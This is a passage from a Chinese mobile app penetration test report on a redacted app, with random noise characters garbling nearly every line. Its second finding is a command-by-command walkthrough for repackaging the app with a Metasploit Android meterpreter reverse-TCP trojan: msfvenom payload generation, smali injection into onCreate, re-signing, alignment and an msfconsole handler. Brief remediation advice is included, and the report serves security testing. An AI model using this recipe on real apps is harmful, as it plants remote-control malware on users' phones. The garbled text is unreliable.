% g% u1 N6 B9 j# s5 \; j
) t, V7 O# r6 B* ~! C & l8 K- _# u Q8 o1 p
* ], O4 I8 g4 K3 i2 H. I r3 l, Q4 S- T5 V9 s
4 C( `& o- B% c, @, A! Y
# y* ~/ ~- k4 f' o; L; c7 V4 U) \8 H
, i+ X& F- g& g9 R% R& ~
4 B7 J5 J; ^" M% w4 G+ B. K - O$ u4 W' k' W; `4 U
( e/ i" ?8 |8 Q$ X 表1-2 测试结果 ) ^; S6 ?7 d1 q/ s$ F; i
: Z7 p) H5 } N0 s$ U" S
0 F7 s) u: e) Z9 [" e% ^
9 g* E p* L$ b1 u * g$ `, F+ R8 C5 c
1 v0 o" B" b) l0 m( D/ p
D, J2 u6 g3 t* ?# ~5 d
& c- ^" B, H; S" `/ G
6 y3 i6 K; u6 ]2 }& o: }4 z9 m4 P
1 W8 t7 N4 p( j) K) w _
z( i- n* Z( X
5 i _2 z2 N f 2 检测结果 / v8 \* M% ~9 W& W( J
: n" W+ r& c( L2 ?# d( x" m
& c0 T/ e. y0 P/ h, ?/ {; T
- P2 \6 R# ]2 B) C: w- y/ a
5 n% g! c. u4 }
3 r1 e8 V% L2 J" K 2.1 某某某
! t! R6 B2 S; v2 a/ ?' h- v& `4 [
( h/ R3 l% K3 `- O( X! |
. x4 N( g: U0 p! L
& w5 Y' ~2 I9 u8 r5 l
/ g& Z' L: l/ @- H# D: D
6 f# g; q$ ]8 a1 z 2.1.1检测目标 % T& f l7 }0 ~( L8 T& V
3 f4 O( [, P2 i9 i) n
# p7 b% u) Q0 ~ }* D7 Y
T S" y3 L0 h! `7 H
5 J0 ^) U% V+ T
' R! R( F: D2 _% j$ j9 M 目标地址: 某某某某某某APP 1 t; m2 w) C! e) u
- [8 F; p2 g( r+ ^, s
, [, n1 b8 h1 G Q4 l; r$ S% T3 u# D1 H9 V
9 }( `4 g- r* Q3 S8 h2 y
2 }/ a: U: i: o; m
2.1.2检测结果
4 J6 S2 W8 `! U/ g2 m
- b8 R6 s; p' v; L2 f
* {1 d! s" ?- L1 \
4 A% \7 T- d$ K
5 k0 k# q. l' Y6 d& F
* u( m6 y O, z5 U- C9 {' e 2.1.2.1
/ M, g; i% X6 y: L/ p% X* {& P. N, n1 d/ R _
! T) Q$ H, |1 \
" L5 I/ `. i Y3 g5 b% J/ y3 e 5 B. M" L( y# \- a
$ q5 {4 q! n# M. r6 B 漏洞链接地址:某某某某某某APP ; T+ k" q. J! D! Y
% W" R7 e/ b* @% \7 i
$ Y8 S1 u- T" N* I3 t
, R$ M+ ~, _, g; x r5 D, W: y+ ?) Q, B+ K
' V0 L9 {; [7 w# y8 [" I
' \, |' W2 G7 D" s" J4 F
! \& n# v7 F) y6 Q8 C3 z
/ @ f4 r) t- \ L6 }9 Z% s, F; \$ Y$ t* _
) Y- T7 j% ~ [ [0 |
9 Z9 d; `8 t2 p" {4 J
漏洞分析及取证:
6 x' v% p& [# X( \; d) \, p- P. v* V. O8 c n; O
3 m3 k. I" N0 U# v7 e/ P- |3 f8 U5 \; v
( j% x6 N$ F# c3 L R5 m
: r5 e1 ~1 N1 L( P' W
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 0 t3 B- h+ d" g/ R: ?+ I
4 G5 K% V* M0 t
. i7 q) G; S" _9 U1 ?& ?
- a0 s4 y5 t. U& o6 t: N' H4 r
! U9 E: k: B7 R
3 q1 ]9 o0 z0 C; U- Q# R% Q
' Y$ U$ `1 @, R7 |
& D9 Z: Z" o1 n+ N6 ?2 s4 v- ~
' b7 ]) x3 Y3 Y, \
' v1 i& |2 Y# R8 G
- ~# j' D( f+ ?) T) o" ?7 f4 B9 @$ I% \+ }; T
9 J$ y" g$ g# q8 p! \( F
: \+ N: ?0 i4 l1 w, w$ O
4 w4 a3 P7 H% W# }1 H% L
& X, k6 _" K( j2 V% @4 A7 b / y. E# a2 h7 j" Q' R8 _
4 l& M9 T. k3 v% x: n3 D
$ o4 A) Z- C9 g4 F( m, K! T0 G+ S1 u" m0 `" Y' L2 ]1 x
' O! w' S! E2 N* \; q( ? b i+ y8 j
9 \" O+ B/ y2 I4 C
. f# I( g$ T r) f
% L7 r3 T9 w) @+ f
5 |1 U5 q/ F7 ?4 h2 H
- V6 q1 d H/ e0 f6 F* g+ E4 ?2 }: G/ l3 ^
: l! }! d/ ~0 Q* B9 [, H2 @
" z T0 [. c# L$ r. D2 I( Q" |
& F$ U, V) D! Y+ ?. b, M7 |6 G0 j, \! q2 ^3 I+ h
- h4 F8 H4 E6 ^- Y. H
: `' c8 n+ |! x" x* \2 G
5 Q2 J" x+ B# D' H: h! g6 p+ {
7 K) [) z9 [ O4 i, h $ \7 ?( b- S% A3 \: U1 }) V
5 ]/ A+ U' X( |: S" T1 L
漏洞危害:高 + L" Q! U. e! S- _+ K7 u2 S( A+ E
1 B9 K9 G, | @4 r$ g1 [5 B. @) J
. K! A. n# i* i0 V* B/ r! |3 P
7 V+ [5 W& L7 r4 k [8 l+ E
9 S. o2 j) ]8 ?1 L1 N* s
$ y5 P* n- M2 e8 s4 Y- r
8 p4 d0 ?/ D# [7 d* w8 T) E
7 f+ N! s& i1 b5 K: N3 F
2 n; G. n# w1 K) L8 J4 |: ^- C- ^/ d7 }5 x3 T1 l
W* D/ w( [$ J5 W0 y
; q3 W& s2 ?: y* j# l; e |
2 M" W9 g3 N; S" A0 b4 ]/ p% J$ C0 C5 v+ K* C6 S
# ^3 z- ^! f5 C: }. f* c+ K
! H( e& `: \1 p) V( M 严重程度 7 o2 N# o$ M! K* L
5 w! B9 ^5 T$ K6 r
6 v" E9 ?' E- `$ d, U7 L R
8 o, c$ A5 s/ L | ! X$ T' h' L/ ]0 a( ^ P: D& D; [
( c5 g. f& F r* p
# R; [; j: D+ d- d# {
7 ^1 c4 P8 i( F3 ~6 f 5 H9 V) E2 e! N& G3 q
) U2 y6 z' p2 r; E 高 ; C5 R' h* Z- L
0 t5 U+ r$ G+ p- z: M7 h
6 A# |9 u' \0 P5 s0 ~2 c# J. f3 @5 @$ w. g+ W( Z- e0 D
|
( Y0 s! A# r4 m8 w; Y) S# ]! i2 a( K) A
n( j2 N! E3 I9 V' X! p$ H R. z7 I8 E7 w( M
/ T. B# e( k- h+ v5 N" z
0 `0 E/ {# G) l# C0 J ■ 7 F( w8 I6 [3 Z; E/ Y, f
% M' n) K1 \ ]1 o, i$ [% t4 q* O
! ~5 ^& q' B$ |% N) W3 a( v, s2 Y2 h9 i# b7 b: @0 n9 J, u
| 5 l7 @* V$ t1 V; V D* K
+ `) `3 a t; }+ O 2 K* ]% o% {) z* O' ]+ |
2 _6 Y3 r' q6 Z$ X s- P) q: M1 f# _
* d/ [ l! D0 u" ~/ _+ Q5 e7 L7 l 中
3 U$ _4 w' |4 L. V; j0 l
; S) l4 W) p/ J, `, o ; A1 w* V+ s# R
4 p" V3 Z r+ @' D0 ~4 o9 `% ? | 7 g; F3 L) O8 z9 X- U* W, ~- s
* Z! [4 w2 ~+ s+ k5 a
: _5 k' W7 n9 R& c
$ \9 P$ q2 }0 ~, s, A2 T" r
2 m( X h2 j P( w6 I
# L/ P- F. e, a 6 Z S: L* w/ C. O
+ ^, n0 J/ u. w5 K& h) }2 w% @
9 G( |' N. f1 [/ t- f6 K4 w+ I+ j& N$ N9 {% g! w' X
|
7 U- R+ {* ?- R, M7 M+ ^9 U/ _ I3 I; N- S2 m, b
* {, w0 V @ N: E3 ?$ n8 q+ a
4 I$ A! o5 P5 Y1 u- a8 n# y
! r2 w' k' Y" K+ R+ S1 y
; a, n( Q+ T) L% c+ g6 ` 低
8 A- S2 U% O/ B1 g
4 G1 w4 ]9 D/ C. o3 j2 [
+ T/ l* x! Z+ ]% h8 ?9 M! |% {1 X* l
|
0 `* n6 z; j/ p6 |& A( X: S% }& n( g8 ] ]% N& m5 y `/ X+ N9 H! W
_ d9 q) d& b' j
; o H% u& V( V2 O2 Y: E J4 f 0 U, e% O4 @( F8 \
6 k# B3 {6 Z% s7 Q) ? " l; c& z) i, Y0 k+ j! O& ^+ n
7 Y" S8 X" w2 F' Q
{% _# q0 ?; j8 B" q( ^: T7 Z" L. |3 Q, J3 Q+ i1 u
|
& n* T' |( r7 d# c% h4 N8 O* n8 s$ x! w% z$ `1 M
7 x" @- w- A z7 W: q4 `) `6 k# g7 ~
$ ?7 P" c( I4 C- \5 N; v" i
2 I8 I5 f% v4 A0 Y0 d: b4 P% ?. N; R% E) j1 E8 m0 G$ e5 m3 q
7 H7 {6 I* y; U7 a5 ` `
- {4 H/ {5 T# s/ b, |* x& ]; @ 8 r5 Y4 f, r" @; n
2 L/ r& N% B+ g& G) g: q+ {3 G# `
) B6 i9 U0 {( d& p7 [6 o9 t+ c1 H2 o+ S+ c" o' o
6 Z7 y1 C8 q6 B2 Y7 ~
1 K% C ~! L# O
. g! L( m# R" p. a+ I1 i# _3 N
( q% b: b' l! V# x
# E, g5 ?' T; f8 b9 B
/ c# c% h3 I n6 G, l 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 . } d" h* @9 r7 q* {
" @1 G6 O5 U# g9 S
4 B9 z/ Z4 E. g# t' X2 v- d
# `" g. v5 y7 B . l! B; n2 \8 l/ V
/ ^, D3 c8 w8 k8 P1 V# s- j' l; y8 ]+ ]
$ F/ d; D6 B' P% m) S: K( c) q% N; ^$ k. B6 }# f( h
" K: p- W5 ^! B {! P+ ~0 n. E; p! p" T" |9 b! A- y
4 [5 b9 K7 T# V+ S4 Q u e1 d
! W! E* @+ }7 f& R8 Q 1 Q; M3 f J: b! Y- R" `! j
- U1 L' M+ M6 n3 r) l4 E
* q# C, Z+ x3 S+ Q6 J4 M9 r# I3 j* O0 B
r: l" c9 J- }1 n
4 ?- p! w( l. H7 ?* @ 2.1.2.2 " m) f y6 p6 v/ X
5 H. z5 S, x) L
: i2 g" G! e* t6 k! l N, e! W# P% }' u8 {3 e/ I
( E7 b u2 J; w2 ~8 I
: x- |1 U+ c- v' B! h( S 漏洞链接地址:某某某某某某APP " @( k! r! b8 k" B, M; O
. m; X; Q' P9 }& u) G- O! |8 A' z
8 v o7 E7 s8 E1 d/ m2 g
8 Y$ V m, t `; f7 ^6 e
& p6 D+ Z' W. x b w
1 q. O c1 H v# P
漏洞分析及取证: ' }7 G# Z! W" K& |) @" x
& G2 M* S3 `3 q
7 p2 l) f8 A% W, R1 C# F' M
2 M" n* }) K7 B# `2 o$ } , n7 g4 { I, Q7 q. l
1 ^3 r; b" ~$ p: V9 G/ i2 ]8 L
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 7 D5 Z% L- m v
3 n* H% v" w4 G6 u! l
/ i6 S% Z1 F" V8 h- i
) P2 C% W6 O' d K% C0 d# G* C / g) A. E/ o5 Q- z/ |- r! ?9 }+ i) {
9 H7 a/ k# O; @% r 用Metasploit 生成木马 apk
, l3 _6 T" K- {& l6 B( C9 C) |
5 ?6 i I- x' O4 e2 z
/ A0 R0 [7 a" V7 [' H" f( R6 {
- G Q# A0 W, ` # n& }2 C: E0 o. \% B9 ^
; o2 ^, I# Y: P' v: b2 b4 r msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
; V, Q: c: _( \6 z' h+ G2 d0 }+ N; o; M. V# U7 b8 m+ v
' Z, ^. \# n0 H+ g& o6 O
: U2 f. }* K( U" Z- C
4 ]! {" b: \" ?) |: a1 I: O# m
4 l0 u* s S) ~: Q+ W% G, e& j 反编译目标apk和木马apk
- o2 I- t8 d0 n( s, X, s3 U ^$ _2 t
& O; W5 ^$ F( Q& B8 W
' S$ G, m, P/ R M, M 4 a8 J3 u9 `$ W7 b, b* ~# J3 n
: z& z# G# f2 t! L+ Q( D# { apktool d target.apk
* `1 {% H2 R( k a! w# O# ^4 g
9 R2 c" ?6 p9 ~* M5 r
apktool d cockhorse.apk
! n! E( k$ N( q& P6 _8 ~ h' c
- w( X, H# N' h. v. S
$ D( s$ E5 T a4 [
, i! x' K4 |& q# e( { 5 e" p5 D8 a3 u9 R
7 w9 B6 o9 q8 f# x8 L: P9 S8 g4 m+ h2 O 木马 apk 注入目标 apk 4 J0 i% R) j7 Y& C5 z% X I: ~% v6 Q
( R4 H3 G$ G0 k. C7 q& f) U
+ H/ t F) |2 S- b. C8 ~9 Q$ f: _5 `3 s- M( @
2 B8 s. B1 H* l: J+ ~
6 a4 l; N0 b& j5 d9 w 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
4 g; C# W+ T1 N3 e5 }+ G5 D
x2 r. `( w+ ^. e invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
; [* y3 [* [; x" k3 C% E' G! T# \5 V+ Q
% A( A1 b) e7 a% j: _3 j- j7 T z" i
0 d( r& A" L8 b5 Z. [& I 0 _6 Y$ j% G, R% ^: D" m
, a+ P5 |; M% p9 n0 E, C0 S 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
W7 @) c0 _* @7 o- _6 J, c/ z* ]2 l3 X" {
* Z+ J# S( x. H' J+ t/ A9 k; |2 e" F0 Z. H
# s6 M" ~- N! t U$ s
0 ^" ?) L+ `4 v 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
; X! b2 s3 i- y3 z1 T- E% n7 b( F% j. Z( `: H4 W! X- b! P1 m; u
& B7 k4 F; k# ^- v" @# L7 ]
+ }( G% V- y9 b' E0 b/ ~2 c
9 a% n( v1 \# [
! r2 _5 p8 T8 A. N5 E) k. R 回编译生成最终 apk
6 w# R3 a* {" B5 k3 c6 n8 F. Q+ q9 f* ~
" A6 k& n# u7 c% u
( e3 B* h* a/ \5 S s1 ~: M V% o* |+ w4 {3 R
8 J8 J0 |6 j7 ^" A( g+ G9 w0 t* Z* F+ U" h( J0 L
重新打包 % K6 m E; k4 x9 L% ~2 G
( U2 Y+ V( z; R$ `; W# C5 S
: ?) Q$ y2 G3 D0 m
7 }. d* J( S) y- c0 V+ l
Q0 O% N! O6 K# ]4 w+ O% ?
6 r+ X8 S% e1 M4 k7 Y) J apktool b -o repackage.apk target_app_floder
! C) y0 f) J- U/ h$ ^6 C+ I9 R3 t6 j9 h5 g6 a) e4 q V! ]$ a
+ l3 o" ^$ P7 ^' z) \. ]
; N. ~ B4 L% r- S) F' l
2 B% G$ P4 L5 ]. ~# q+ @3 g
4 N, v' n7 x! ?# r& f( Q$ ?) [* d 创建签名文件,有的话可忽略此步骤 9 k+ |0 L/ v1 W
# }- j3 x% ~( i
: Y0 s, D) I+ A& \3 \4 j4 n5 U0 t9 ^+ y" U8 ]0 w
7 @2 Y ~8 u7 _* A
& e* p3 C. N( [2 F! i% \ keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
& M. ]6 a8 v! T# F, f4 F( U0 W& f+ i9 `( c0 N
& z! h* l3 O' g: w4 f! i% q
3 H4 S3 A, G9 e+ k8 j% H % w+ B' `0 g% J4 v, z
' \% Q6 \3 a; e [
签名,以下任选其一
, u/ Y. E# j* T2 {: S* g& O& w1 w3 c( ?
$ f. `) G2 K$ f$ W, x* d3 g) [9 z4 I& o6 D
# {$ N% }# B: W5 D! ^) i& \
# u* e: o( Y" ], M$ q7 n& s" }
jarsigner 方式
0 s9 t1 B8 F& P E' R' }+ a/ s& A' m, s9 h/ B
c, y K# m p2 V# f
5 p3 t6 {9 L5 M1 e" S
( x% L; D( _ G0 @; @" }7 c/ ? |
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
0 r, G m8 a; X ?
" S% G+ X9 W/ O5 F0 e
* m' P) f2 o% u+ n8 H4 M6 J& ?
. {8 m" e* L9 |7 B' x3 |, u
3 G* [7 ?& m9 V. t, p5 G; r6 [7 r6 Y5 @" W
apksigner 方式
- j% `9 W7 R4 d+ I a/ ~; G( n5 \; Z& L) E7 A3 W9 W2 _4 K
7 y# S( q) C! E- E J9 Y$ l! k
7 s/ Q) K9 ^ B$ r2 S |
7 u5 {, V1 J$ I7 E5 n k3 M
" R5 N; u, y$ M9 Y1 F2 L. I apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
# M' E, f1 V+ b5 }, [& I# o& `1 [) A1 c( P, ~# m' Y
. z( ?0 k/ C: e$ k& t
; h2 M* c- g$ V. X
" Q% E- y+ f+ ?8 A
6 _" i; t/ l% t. V 如需要禁用 v2签名 添加选项--v2-signing-enabled false / U# @0 ]0 P/ m1 S! [
0 d: ]/ U: J. M4 j" J2 `- D
/ u$ z, m, {( e" a% ^3 t/ C! {' S
; R! T; Y5 g% b+ l
9 I8 R8 c' m0 J* E1 C7 n7 \( C- X+ ~9 C* p. }
验证,以下任选其一 : R6 x) r7 E. O( B3 j% y% i
7 j: R. X! h$ Z+ t
: C/ \4 L- h7 x2 y2 ~5 J1 s9 E: P$ [$ p; R$ T
& @7 j; n- G( N" ~6 o
8 l7 s( m( i( R5 E5 t jarsigner方式
( L! u1 U0 e' U+ O* }% w5 y0 h& y3 i4 d
0 M' w$ t- X% f8 A8 q) w& D8 g' H. N: h
2 O5 V! T! Z8 M8 J, X9 U2 f( }$ x4 T
jarsigner -verify repackaged.apk
2 ~5 `% S" {% Y- X+ P) `) C/ f3 \( C7 n1 Y( M. ]& T6 P
+ q' z* c# ]2 K9 \+ b9 U6 \9 [1 Z
7 O% a6 |' o( c7 X( N! h- Y
# g( H* K' z) e% e3 v7 l% ^$ R! g
* X" ~5 R& g- Y G+ p4 B apksigner 方式
! _* r& S% P7 Q4 X3 ?
" Z3 a. F" d C, @/ j" d
. B: ?: |/ r) K" h, Z4 W$ k. ?1 c
7 N7 x9 f$ p0 ^1 R' C
) I( R! C0 p6 v3 n apksigner verify -v --print-certs repackaged.apk
, t6 D1 @( E! V, o% M
! _" b4 G/ j4 q8 r. g
9 |3 N4 f. d2 ~" d3 }7 C
I3 m7 ]3 ?2 U/ b+ { " c- J4 G. g% e
2 |2 v; W# L3 O1 h+ \9 Z) G
keytool方式 $ J# l. `3 U- \3 Z* W
" @3 o0 W' l @8 f& }
& X$ A5 s& P7 F5 V6 ~
, j4 C! }8 l3 n
, E6 Z2 {$ p3 S' ]% S( s7 j/ N* O1 w: G/ }
keytool -printcert -jarfile repackaged.apk
' P' B% W6 \5 c& @# }: e1 T+ S% Q5 N* _# l! h$ u/ C
* c' n; Y k4 k2 ~
$ P; x e" _/ d" `9 s9 _4 a # }' J( N- b/ M* W
1 v9 G4 M/ ~/ | 对齐 ) A# b$ G. T3 M* o T/ f* `
7 i7 g% i6 |6 B. ]( S9 F
2 Q( r4 o. q7 n3 E( O4 E" ?, _1 C: C8 T+ I
% V6 `$ `6 z; f" S1 a: U" n6 \7 p) g3 I/ j
字节对齐优化 . x0 [9 E. P6 h
; l; H8 \: h, M U% l; m
& S2 M% b' p, X# H/ O! S5 \/ p4 g0 a* v; z1 F, w1 \5 E& Q5 Q
3 `/ L- o& B' v0 X2 p6 P6 U
2 {5 G4 E4 @/ x1 r6 c9 h zipalign -v 4 repackaged.apk final.apk 2 |4 F. q7 I R; e! |3 g+ e$ A
9 @" h9 ]! Q: e2 E- N1 u
- R; ?( R1 a, S& d, T0 n
/ N$ H8 k# ?2 E2 H. }7 h
- H9 ^9 g! m0 L4 }; a. x1 p+ J4 B
检查是否对齐 n! D* H$ \& f$ c" h
' e# N; H5 M/ S. l% B
: X0 b9 x) l( ~" \! S: {; v1 r z; `# W$ m& H2 z1 o
7 x' r. z M8 V" p X/ H
: d3 n, ?2 ^7 c( Z, Y
zipalign -c -v 4 final.apk ! ^9 s8 Y3 ?* l& v; V- a$ G$ \+ i
) L0 e; |+ d$ C: v8 y G
' p8 Q k: C. I( ]6 `" \6 m
9 E6 V6 h" G' D: S0 H1 H8 {( n
; D/ t+ h) B5 `. K; n; ]% g
: u3 c3 g. Z+ O* a 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
+ ?2 n0 C4 R5 v+ `+ ~! P$ m( I' B& W4 y5 ?9 {
|/ ^( }' b" Q& d$ y( w
% t/ |$ [) ?8 p: ~7 a8 @
( y" E' P( Z" C+ @2 Y! Z4 f% |9 d1 l4 l
启动Metasploit控制台,配置参数等待上线
7 [* Y, m5 S% ~2 P8 M' u
. g6 g' D8 k$ k/ T; N
; z- g& B) _( s5 b3 l3 A, i- I, M( j" @
P3 G0 Q! l- z3 ~& o5 @/ H* E I |& t+ s. s0 L
在终端依次输入如下命令 3 @. q3 J7 N- [) C
* y4 h: X7 _4 [) E: x8 g
3 \% P d# H( p1 v' ?) F/ ]: a$ I) V
9 a) J: B5 Z( o) W0 x! F
$ e& C4 t: p- L( v6 A msfconsole 7 ]5 G9 S0 W8 f, `" [4 b+ t- O
: K% v- n# f5 s2 a% }
% U( |8 \9 d# c+ o' |7 }
& b. G( K9 X$ Y: O) z: j0 V
% X: x# g) p8 f+ u9 _! v
: D, z7 t( f4 M& T; i use exploit/multi/handler
- v0 l! x j- g' l: T# @
1 ^! J+ p6 u! j
& A( a+ B6 c3 A+ a. }2 A0 D- T
1 w% P- _ V2 u5 Y
1 {) d; _# { ?& n5 G7 `6 }0 u% B
$ f) v9 Z6 N3 V! W( R+ p6 P set PAYLOAD android/meterpreter/reverse_tcp 6 d. b2 ^2 i9 Z3 f6 k! N0 U* H4 I
& k, E8 _+ j+ Y e2 {# ^# W
; V3 i K) s" M' t
7 k6 d; Y7 `( v$ G0 O. N
9 t3 v! x s) S9 X, _! I
G; J2 {! X0 {/ I/ s7 t0 }0 U set LHOST 192.xxx.xx.xx
# g$ w3 A4 E1 j
5 e% ]2 N0 X* |! T2 }( _
, m- I7 a8 j; M) H# A+ {& @% a" [; ^
/ h1 o$ p- m% @2 Y4 T9 A3 z: F
' ]7 ^" o8 }& x" G( p& B. H' O% ]0 A# c0 o. l' y
set LPORT 4444
) s3 O7 d, p# r7 p* H, k
0 S- ]6 H4 l$ l H) b# D3 I
/ x& S4 h, {; m/ f: n% Z8 x9 j4 |) e
$ Z8 y! d3 c& p% O7 c: U0 e& B1 D2 G: U) z5 O
exploit $ ?3 r% k$ L- j4 H9 w) L
$ m) ]3 E* i" R1 G
) G6 P. H1 U7 v b" M( R0 B$ B
+ I2 H P" l& G# F9 n; C
5 w/ b& G4 n$ N- U. b+ H! p( D' H: ?9 M6 K6 _' b3 H
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
! S8 c. c& T [& O6 y% i! D
& D a2 ^6 e$ R8 w# r; F
$ i& X9 G* Q' ?7 F) ]6 j
% b: T$ Z' ?: C4 E7 k% q. O
T8 Q2 t, Y0 _" x W8 N6 g( L- Q' a5 a* n$ r, T# ]7 b0 U0 [
漏洞危害:中
: }" e9 r4 X- Q+ _$ g* N
/ \* S# _- U" D8 e: W# W
F1 k- n8 r) S2 _+ L: ^
, |4 l t9 y( _
- R0 R/ I) r k* K+ R5 v; ]% x! m4 Q0 c4 H
- ^+ g) J& f" @
' ~5 [) L1 c7 S7 l" R" u8 L/ b. B
+ p/ Z, V# S9 V& z }2 y, B! Q6 t6 c2 a0 l! [" j& v7 Z2 H) \6 ?
9 v' c- H/ V. ?8 C. Q5 O
' S8 j0 l8 y3 r4 ]( C
# o9 K0 T4 ~$ X9 _" e" q5 A' p2 I) j; X/ F% ^2 T
| $ A1 i$ ^' J# ]6 p+ }& Q
6 Q' y* K( o9 y2 f j 7 F2 T; {2 e+ j, l& X
- p* F* j' k* t; b7 _5 d
严重程度
5 `# h) E7 ?! A$ r7 z& h: _# d; N; `+ K. i% [: m
- f4 b9 H& D t. A/ z' H
4 r2 n1 }5 \( J | / P9 d& m! q; y7 l# s
+ j% h9 a: Z* U
0 d, B1 m) g9 a+ W1 [& K, o# u- ?
5 W- ]3 p# c3 G3 R3 }
& f* @4 B, a& [* N! [
. i4 J1 q% z; h' h) O$ l 高
4 `3 K" [/ J1 l* e% F5 {1 t+ g- H) f |# t( \
8 V- h9 j6 E% E/ q7 v/ p: n( r, I* m* m( O# ~% A
|
" T5 k: v! C% ]6 c1 D6 B2 L3 O# E3 i( \+ Z- C. m7 c! P1 S: J3 x( B! `
# B1 ?- p& U5 x2 U8 e
( D3 h- V. Y7 r/ k, s
R8 \# x7 b; z4 M; b
# B3 @' r# ]2 i! j- |3 z ■
: B* z/ }3 H* N# a1 U" q1 o6 K" ^' I1 i+ ]. z
$ F+ x+ h" T- w# v
+ c8 @9 _( v& u/ t
|
! [, t' ^3 M \0 E' n
+ Q& e' H0 R6 J5 W8 U 9 X" o4 I7 [6 ]; ~' G7 [1 C: q7 w e
6 _' A6 p& }9 C) z' z - [1 ~ b1 F7 } D* R
+ e" ? o: D: F6 G 中
7 _0 H. @/ \8 ^' J1 x1 O
& g$ A: i: z# H8 S; @8 G , d4 p. J( m3 U0 j! {; k" ]- Q
& q* |; A | U/ A; k6 Q
| ) U2 o; w/ M5 f6 g- D3 Y) O
) E8 }5 o6 f# J, m4 T3 h- k
; s9 [7 i7 s% e! R+ [3 M
7 F7 j, Q+ m6 P& L/ n, d 9 ~; P* j6 X& w/ m; \. s. h9 X
" |# ~- ~8 q) R5 V$ M9 T% c7 c
9 ^2 P* v/ i9 U6 P% a8 H' p+ u' Y
! ~6 m# k3 \6 Y; f* r
6 M1 n q' b$ |5 b# u
0 n7 x! X: |$ M
7 A7 \: |# I' [, X+ B2 g
7 j3 b0 ]) j! w1 h$ y( V- t |
( {* o) }% d, f4 _+ S A' @* K8 p) ~' c
* A9 O' j$ u2 ?' @% C v# N
7 S, I7 z3 Q2 b 6 c4 J6 Z* O0 L2 O: O5 `
7 W; w1 _# o1 N8 U
低
: h) c) `5 }, L9 b& E7 `
) V7 N4 K3 x3 Q f
Y9 N) {3 {1 g
9 v) u2 R) |# ]' \4 k Z5 O | # Q' B" A' n* G4 ]% Z
! M* G$ S( p( u- s8 X4 G
5 H' T: ]5 A9 n. c+ J" K* l5 b x3 M2 @$ P& i
; D7 j& a* ?8 O$ N; `
: ?6 Y' W* P' W! P* a
* o' ~7 F" b% L' A( z( T7 M& R) l
2 S* `. u8 K' i6 z& g
% p' s ]; j4 }
! ?. W1 I5 k- l
. M* p5 m. R3 v
9 u4 \% P1 [ e* D/ T |
3 } v! m4 f1 l1 I R& w$ W
' a4 L+ B9 L5 L( r+ c+ ^
4 H9 B4 ~+ r3 _( M7 b6 z$ e) D3 Y- y
' ^( k' f3 ] W
& V7 v) y; T C8 @8 l8 X* U! I" G- G# C9 r! x+ r$ f! K
8 l0 w1 Z. R& a- R/ v' r
$ X5 y/ _! a* X
3 d2 w! }* r; J& x. u4 y3 q: T3 `0 j" w6 w g' t6 Y
1 H- `, S0 N3 e* C2 q: s, T
1 e1 o# b6 H7 A' J# Y
6 V" s& T9 Z- ^/ I) a4 Q
0 e, P; O) N' ~# Q: g) m+ C! w# y
+ w6 ~$ k; p, m3 T4 I1 ^
\8 U: e$ m; S2 f% l- M6 p
' t0 |4 V7 c( q9 e. e/ x
; p9 h( z) J6 o: E 修复方法: " ?& i. ^. V+ w( [; Q
4 T% x: |1 j2 s- ~+ x
/ _3 [& C1 P6 p" ^8 ^) a, E) m" L$ D- s) e
6 H5 D6 E& Y. \5 `. y
0 D" h, H1 k; v6 n1 Q0 T/ N& f A0 u% o
1.在 APP 启动时应做签名校验防止二次打包。
: |, x3 Y) u Q( a' U2 N# d+ j% N
# P1 q x* O" h' ]7 ~
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
: F5 @) Q# n; M9 |% z% y" F
2 H% E) ?6 N$ k' l8 T% [/ N) o' p
7 Z. y, W" M# f
- x5 t7 e! `2 d B. }
- s' @+ B1 U5 B+ z( G1 ]2 n7 A4 {- ^8 ]
W3 b2 g1 ^- v) G
, ^& _) M3 Q M5 |' w: i , j" p, U! X! W2 z
* I. R7 e" K2 H3 y# h9 q2 l
/ I4 |7 {- V6 T" M6 L0 \4 J5 f l* ]
/ n! F5 L& F- i# V* r
: Y% N$ C ?/ Q) g1 C+ {7 ]7 ~
' n6 A6 a$ [/ u
2 ?' f/ Y3 S* E% g& ^: N& N7 C& w2 o+ L" R" |1 z- g
% E" \: _# D3 n9 C9 ?; d
; @4 S$ J3 k3 m
/ C/ B. T" C+ w% g, p7 u- N
5 ?% e" J/ H" P/ T. q